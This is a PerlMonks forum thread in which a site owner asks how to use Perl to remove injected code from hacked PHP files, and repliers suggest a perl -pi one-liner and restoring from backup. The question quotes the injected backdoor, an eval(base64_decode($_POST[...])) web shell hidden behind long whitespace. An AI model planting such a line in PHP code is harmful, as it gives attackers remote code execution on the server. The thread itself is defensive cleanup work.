Anonymous Monk has asked for the wisdom of the Perl Monks concerning the following question:

Hi Guys,

I need some help. Somehow, I've got some infected code running on a site that inserts code like this into PHP files.

<?php                                                                                                                                                                                                                                                               eval(base64_decode($_POST['n7a68bc']));?><?php

I can find a way to remove the eval part, but I'm stuk at 

$_POST ['variable']

[download]
The character count between the brackets '' is always the same, so that should narrow it down a bit.

Could you guys perhaps help me to create an effective find replace hotfix?

Replies are listed 'Best First'.
Re: Perl variable find replace
by Anonymous Monk on Jul 26, 2014 at 17:43 UTC
[reply]
Re: Perl variable find replace
by Anonymous Monk on Jul 26, 2014 at 17:41 UTC
    I used something like this as a base: 
    perl -pi -w -e 's/find/replace/g' 'find ./ -name *'

    [download]
    I am only worried about the () for the functions, the [], the closing php statement and the variables. Thanks for the help.
[reply]
[d/l]
Re: Perl variable find replace
by 1s44c (Scribe) on Jul 27, 2014 at 09:55 UTC

    It's not clear what you want. Do you want a RE to strip out that php and a way to apply it to multiple files? How about some sample input?

    It looks like your server was compromised here, you might want to restore it from a known good backup instead of trying to clean up the mess. (and don't use windows servers..)

[reply]

Back to Seekers of Perl Wisdom